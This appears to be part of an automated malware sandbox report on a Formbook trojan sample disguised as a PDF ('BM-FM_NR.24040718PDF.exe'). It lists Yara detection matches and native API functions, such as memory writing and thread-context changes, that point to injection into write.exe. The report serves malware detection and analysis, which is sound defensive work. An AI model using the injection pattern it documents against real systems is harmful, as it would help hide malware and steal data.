        Source: Yara matchFile source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk,2_2_36B234E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_36B22D10
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36B22B90
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B23C90 NtOpenThread,2_2_36B23C90
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B23C30 NtOpenProcessToken,2_2_36B23C30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B238D0 NtGetContextThread,2_2_36B238D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B24570 NtSuspendThread,2_2_36B24570
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B24260 NtSetContextThread,2_2_36B24260
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22EB0 NtProtectVirtualMemory,2_2_36B22EB0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22E80 NtCreateProcessEx,2_2_36B22E80
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22ED0 NtResumeThread,2_2_36B22ED0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22EC0 NtQuerySection,2_2_36B22EC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22E00 NtQueueApcThread,2_2_36B22E00
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22E50 NtCreateSection,2_2_36B22E50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22FB0 NtSetValueKey,2_2_36B22FB0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22F30 NtOpenDirectoryObject,2_2_36B22F30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22F00 NtCreateFile,2_2_36B22F00
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22CF0 NtDelayExecution,2_2_36B22CF0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22CD0 NtEnumerateKey,2_2_36B22CD0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C30 NtMapViewOfSection,2_2_36B22C30
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C20 NtSetInformationFile,2_2_36B22C20
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C10 NtOpenProcess,2_2_36B22C10
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22C50 NtUnmapViewOfSection,2_2_36B22C50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22DA0 NtReadVirtualMemory,2_2_36B22DA0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22DC0 NtAdjustPrivilegesToken,2_2_36B22DC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22D50 NtWriteVirtualMemory,2_2_36B22D50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22AA0 NtQueryInformationFile,2_2_36B22AA0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22A80 NtClose,2_2_36B22A80
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22AC0 NtEnumerateValueKey,2_2_36B22AC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B22A10 NtWriteFile,2_2_36B22A10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05204570 NtSuspendThread,LdrInitializeThunk,5_2_05204570
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05204260 NtSetContextThread,LdrInitializeThunk,5_2_05204260
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_05202D10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_05202DA0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202C30 NtMapViewOfSection,LdrInitializeThunk,5_2_05202C30
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_05202C50
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202CF0 NtDelayExecution,LdrInitializeThunk,5_2_05202CF0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202F00 NtCreateFile,LdrInitializeThunk,5_2_05202F00
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202E00 NtQueueApcThread,LdrInitializeThunk,5_2_05202E00
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202E50 NtCreateSection,LdrInitializeThunk,5_2_05202E50
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202ED0 NtResumeThread,LdrInitializeThunk,5_2_05202ED0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052029F0 NtReadFile,LdrInitializeThunk,5_2_052029F0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202B00 NtQueryValueKey,LdrInitializeThunk,5_2_05202B00
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05202B10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202B80 NtCreateKey,LdrInitializeThunk,5_2_05202B80
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05202B90
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_05202BC0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202A10 NtWriteFile,LdrInitializeThunk,5_2_05202A10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202A80 NtClose,LdrInitializeThunk,5_2_05202A80
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_05202AC0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052034E0 NtCreateMutant,LdrInitializeThunk,5_2_052034E0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052038D0 NtGetContextThread,LdrInitializeThunk,5_2_052038D0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202D50 NtWriteVirtualMemory,5_2_05202D50
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202DC0 NtAdjustPrivilegesToken,5_2_05202DC0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202C20 NtSetInformationFile,5_2_05202C20
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202C10 NtOpenProcess,5_2_05202C10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202CD0 NtEnumerateKey,5_2_05202CD0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202F30 NtOpenDirectoryObject,5_2_05202F30
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202FB0 NtSetValueKey,5_2_05202FB0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202EB0 NtProtectVirtualMemory,5_2_05202EB0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202E80 NtCreateProcessEx,5_2_05202E80
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202EC0 NtQuerySection,5_2_05202EC0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052029D0 NtWaitForSingleObject,5_2_052029D0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202B20 NtQueryInformationProcess,5_2_05202B20
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202BE0 NtQueryVirtualMemory,5_2_05202BE0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05202AA0 NtQueryInformationFile,5_2_05202AA0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05203C30 NtOpenProcessToken,5_2_05203C30
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05203C90 NtOpenThread,5_2_05203C90
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FE76B0 NtCreateFile,5_2_02FE76B0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FE7AC0 NtAllocateVirtualMemory,5_2_02FE7AC0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FE78E0 NtDeleteFile,5_2_02FE78E0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FE7800 NtReadFile,5_2_02FE7800
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FE7970 NtClose,5_2_02FE7970
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_004048C50_2_004048C5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_004064CB0_2_004064CB
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00406CA20_2_00406CA2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAF6F62_2_36BAF6F6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B636EC2_2_36B636EC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8D62C2_2_36B8D62C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B916232_2_36B91623
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D6462_2_36B9D646
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B854902_2_36B85490
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5D4802_2_36B5D480
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAF5C92_2_36BAF5C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA75C62_2_36BA75C6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B355502_2_36B35550
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD2EC2_2_36ADD2EC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE13802_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAF3302_2_36BAF330
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B2508C2_2_36B2508C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA70F12_2_36BA70F1
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFB0D02_2_36AFB0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B1E02_2_36B0B1E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF51C02_2_36AF51C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8D1302_2_36B8D130
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF1132_2_36ADF113
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B3717A2_2_36B3717A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB91432_2_36BB9143
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF1EB22_2_36AF1EB2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA9ED22_2_36BA9ED2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B93FA02_2_36B93FA0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA1FC62_2_36BA1FC6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAFF632_2_36BAFF63
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6FF402_2_36B6FF40
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B89C982_2_36B89C98
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0FCE02_2_36B0FCE0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B77CE82_2_36B77CE8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF3C602_2_36AF3C60
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8FDF42_2_36B8FDF4
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF9DD02_2_36AF9DD0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA3D222_2_36BA3D22
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAFD272_2_36BAFD27
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA7D4C2_2_36BA7D4C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0FAA02_2_36B0FAA0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAFA892_2_36BAFA89
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B81B802_2_36B81B80
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAFB2E2_2_36BAFB2E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B2DB192_2_36B2DB19
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B698B22_2_36B698B2
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA78F32_2_36BA78F3
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA18DA2_2_36BA18DA
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF38002_2_36AF3800
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0B8702_2_36B0B870
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B658702_2_36B65870
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAF8722_2_36BAF872
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF98702_2_36AF9870
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AB99E82_2_36AB99E8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B359C02_2_36B359C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF06802_2_36AF0680
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEC6E02_2_36AEC6E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAA6C02_2_36BAA6C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0C6002_2_36B0C600
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B146702_2_36B14670
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF27602_2_36AF2760
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFA7602_2_36AFA760
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA67572_2_36BA6757
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF04452_2_36AF0445
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBA5262_2_36BBA526
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AB22452_2_36AB2245
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFE3102_2_36AFE310
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE00A02_2_36AE00A0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9E0762_2_36B9E076
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB010E2_2_36BB010E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA0EAD2_2_36BA0EAD
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE2EE82_2_36AE2EE8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B90E6D2_2_36B90E6D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B10E502_2_36B10E50
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B32E482_2_36B32E48
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAEFBF2_2_36BAEFBF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF6FE02_2_36AF6FE0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFCF002_2_36AFCF00
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBACEB2_2_36BBACEB
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B08CDF2_2_36B08CDF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFAC202_2_36AFAC20
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6EC202_2_36B6EC20
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE0C122_2_36AE0C12
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA6C692_2_36BA6C69
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BAEC602_2_36BAEC60
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9EC4C2_2_36B9EC4C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B02DB02_2_36B02DB0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEAD002_2_36AEAD00
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AF0D692_2_36AF0D69
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B92AC02_2_36B92AC0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BACA132_2_36BACA13
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0529A5265_2_0529A526
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D04455_2_051D0445
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D27605_2_051D2760
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051DA7605_2_051DA760
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052867575_2_05286757
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051EC6005_2_051EC600
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051F46705_2_051F4670
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D06805_2_051D0680
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528A6C05_2_0528A6C0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051CC6E05_2_051CC6E0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0529010E5_2_0529010E
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0527E0765_2_0527E076
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051C00A05_2_051C00A0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051DE3105_2_051DE310
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051CAD005_2_051CAD00
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D0D695_2_051D0D69
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051E2DB05_2_051E2DB0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0524EC205_2_0524EC20
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051C0C125_2_051C0C12
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051DAC205_2_051DAC20
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05286C695_2_05286C69
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528EC605_2_0528EC60
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0527EC4C5_2_0527EC4C
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051E8CDF5_2_051E8CDF
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0529ACEB5_2_0529ACEB
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051DCF005_2_051DCF00
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528EFBF5_2_0528EFBF
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D6FE05_2_051D6FE0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05270E6D5_2_05270E6D
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051F0E505_2_051F0E50
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05212E485_2_05212E48
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05280EAD5_2_05280EAD
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051C2EE85_2_051C2EE8
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528E9A65_2_0528E9A6
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051CE9A05_2_051CE9A0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051FE8105_2_051FE810
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052708355_2_05270835
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051B68685_2_051B6868
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051E68825_2_051E6882
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0526C89F5_2_0526C89F
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D28C05_2_051D28C0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D0B105_2_051D0B10
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05244BC05_2_05244BC0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528CA135_2_0528CA13
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528EA5B5_2_0528EA5B
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05272AC05_2_05272AC0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052155505_2_05215550
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528F5C95_2_0528F5C9
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052875C65_2_052875C6
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0523D4805_2_0523D480
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052654905_2_05265490
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052716235_2_05271623
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0526D62C5_2_0526D62C
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0527D6465_2_0527D646
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052436EC5_2_052436EC
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528F6F65_2_0528F6F6
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051BF1135_2_051BF113
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0526D1305_2_0526D130
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0521717A5_2_0521717A
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052991435_2_05299143
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D51C05_2_051D51C0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051EB1E05_2_051EB1E0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0520508C5_2_0520508C
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051DB0D05_2_051DB0D0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052870F15_2_052870F1
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528F3305_2_0528F330
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051C13805_2_051C1380
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528124C5_2_0528124C
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051BD2EC5_2_051BD2EC
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05283D225_2_05283D22
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528FD275_2_0528FD27
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05287D4C5_2_05287D4C
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D9DD05_2_051D9DD0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0526FDF45_2_0526FDF4
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D3C605_2_051D3C60
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05269C985_2_05269C98
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05257CE85_2_05257CE8
